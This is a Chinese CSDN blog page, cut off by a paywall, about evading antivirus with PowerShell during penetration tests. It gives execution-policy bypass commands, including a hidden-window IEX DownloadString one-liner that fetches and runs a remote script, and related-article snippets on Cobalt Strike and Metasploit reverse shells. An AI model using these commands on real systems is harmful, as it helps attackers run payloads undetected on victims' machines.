对powershell的一次免杀

最新推荐文章于 2024-06-02 13:13:06 发布
最新推荐文章于 2024-06-02 13:13:06 发布
阅读量4.2k 收藏 5
点赞数
文章标签: 搭建环境 SQLserver ASP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hungchuiho/article/details/121436429
版权

powershell介绍

powershell是一个基于.Net的shell和脚本语言,它可以帮助管理员进行一些自动化的操作,Windows 7及以上的操作系统默认安装,同时它是支持跨平台的!一旦攻击者可以在一台计算机 上运行代码,他们就会下载PowerShel脚本文件(.ps1) 到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行,可以理解为PowerShell 是 cmd 的加强版。

powershell存在六种执行策略:

Unrestricted 权限最高,可以不受限制执行任意脚本
Restricted 默认策略,不允许任意脚本的执行
AllSigned 所有脚本必须经过签名运行
RemoteSigned 本地脚本无限制,但是对来自网络的脚本必须经过签名
Bypass 没有任何限制和提示
Undefined 没有设置脚本的策略

我们电脑上powershell一般是默认策略
在这里插入图片描述
想要更改powershell的默认策略,可以使用Set-ExecutionPolicy Unrestricted,将Restricted策略改成Unrestricted,不过这样在渗透中会被杀毒软件发现。所以在渗透时,就需要采用一些方法绕过策略来执行脚本, 比如下面这三种。
● 绕过本地权限执行

上传xx.ps1至目标服务器,在CMD环境下,在目标服务器本地执行该脚本,如下所示。
PowerShell.exe -ExecutionPolicy Bypass -File xx.ps1

● 本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden NoLogo -NonInteractive -NoProfile File xx.ps1

● 用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonI IEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

powershell描述参考:
https://www.cnblogs.com/coderge/articles/13768824.html

杀毒软件检测原理

杀毒软件的设计者分析各种病毒程序,从中提取特征代码形成病毒特征数据库,作为查找病毒的依据。用户安装杀毒软件后可以对计算机系统中的内存和磁盘进行扫描,对系统中的文件逐一与病毒特征代码进行比较,从而发现并清除感染

最低0.47元/天 解锁文章
阿户.
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PowerShell一次打开多个文件的方法
01-20
有时候,我们想通过PowerShell脚本一次性打开多个文件,尤其是相同后缀名的所有文件。我们来写一个函数,函数名为Open-File,通过传递一个*.后缀给此函数,实现一次性打开所有的此后缀的文件。 代码如下: Function ...
利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀
m0_62239233的博客
04-18 752
记录渗透学习中的实验过程。
使用 PowerShell 安装 卸载Microsoft Defender 防病毒
allway2的博客
03-21 1347
使用 PowerShell 安装 Microsoft Defender 防病毒验证 Microsoft Defender 防病毒是否正在服务器上运行验证防火墙保护是否打开。
Cobalt_Strike(CS)渗透工具安装使用到免杀上线
最新发布
qq_47289634的博客
06-02 415
接着写一段C代码,对加密后的shellcode进行解密并执行,注意后缀是.c,不是.cpp它们是不一样的。把生成的exe文件放到虚拟机执行之后一样上线,这样要注意把加密后的shellcode也要放入虚拟机。上面代码运行之后会在当前文件夹下生成一个bin文件,记住这个文件的位置,这里我把它放到了E盘下面。记得关闭杀软,不然会被删,把生成的exe文件放到目标主机双击,即可上线cs。vt过60,一大半了,对于刚接触免杀的我来说,已经不错了。这里代码有很多是我方便调试写的,可以去掉那些打印的。
获取Powershell命令行参数
墨鱼菜鸡
09-09 833
这个是偶然发现的,通过测试可以在r0中拿到在powershell输入的命令行参数。 原理是hook NtAlpcSendWaitReceivePort函数,通过解析该函数的第三个参数发现类型为0x01d8时候在偏移0xd0的位置就是powershell参数的位置 下面是代码 #include <Ntifs.h> #include &...
结合使用powershell绕过360
CODING...
02-27 4413
1.使用web_delivery模块: 使用kali的msf中的exploit/multi/script/web_delivery 选择target,这里要用powershell 然后设置payload,还是选择最爱的windows/meterpreter/reverse_tcp 设置相应的参数 然后exploit,得到一段在受害机上执行的shell代码,然后利用
Powershell绕过执行及脚本混淆
hl1293348082的专栏
03-28 1213
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。 Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。 引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.
CS免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
PowerShell函数一次返回多个返回值示例
01-10
本文介绍在自定义PowerShell函数时,如何让函数返回值,如何接收返回值,如何让不相干的内容不放到返回值数组中。 PowerShell函数体中的任何输出,一般来说,都会以返回值的形式返回给函数调用者。多个输出的内容是...
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
Powershell
03-20
PowerShell是一种强大的命令行接口和脚本语言,由微软开发,专为系统管理员和开发者设计。它基于.NET Framework,提供了一种更为现代化、面向对象的方式来管理Windows操作系统和应用程序。相较于传统的命令提示符...
CobaltStrike使用-第九篇-免杀
Love&Share
12-08 6976
本篇将会介绍CS payload免杀工具的使用 文章目录杀毒软件杀软常见扫描方式杀软扫描引擎常见免杀技术免杀工具使用HanzoInjectionInvoke-PSImagePython脚本封装Artifact KitVeil Evasion免杀插件 常规杀毒软件的目的就是发现已知病毒并中止删除它,而作为攻击者则需要对病毒文件进行免杀处理,从而使杀毒软件认为我们的文件是合法文件 杀毒软件 杀软常见扫描方式 扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。 程序窜改防护:即是避免恶意程序借由删除杀.
python挖矿脚本_windows应急响应 -- powershell挖矿病毒清理办法
weixin_39538451的博客
12-16 1248
一、关于powershell挖矿病毒在2019年4月22号,对公司几台服务器进行进行病毒排查,发现有两台windows服务器CPU使用过高,查看进行时发现poweshell进程占用CPU,通过百度确定该进程被植入了挖矿病毒,该病毒采用的是WMI+powershell的内存驻留方式实现无文件挖矿和横向感染。二、存在该病毒的现象机器卡顿,机器CPU使用较高,进程中发现powershell.exe占用c...
Powershell免杀
mingyqf的博客
05-11 2402
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell最常用的方式
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 794
免杀对抗-Powershell-混淆无文件
利用powershell进行免杀
PortugalCR7的博客
06-29 197
利用Invoke Obfuscation进行混淆。查看powershell的版本号()
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描
代码讲故事
09-16 493
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描。
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 695
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
cobalt strike木免杀
xf555er的博客
05-02 9719
0x001-针对powershell免杀 工具:Invoke-Obfuscation 操作实例: 1、利用CS生成powershell 2、进入invoke-Obsfuscation文件,使用powershell命令执行 3、利用powershell命令执行免杀后的ps1文件,成功上线 0x002 -针对可执行程序(.exe)的免杀 工具:shellter 1、进入shellt...
powershell 脚本运行一次 参数加1
05-26
你可以使用以下 PowerShell 脚本来实现: ``` param( [int]$value ) $value += 1 Write-Output "New value: $value" ``` 在运行脚本时,将参数传递给 `$value`,然后将其加1。最后,输出新的值。 例如,如果你将脚本保存为 `test.ps1`,并运行以下命令: ``` .\test.ps1 -value 5 ``` 则输出为: ``` New value: 6 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值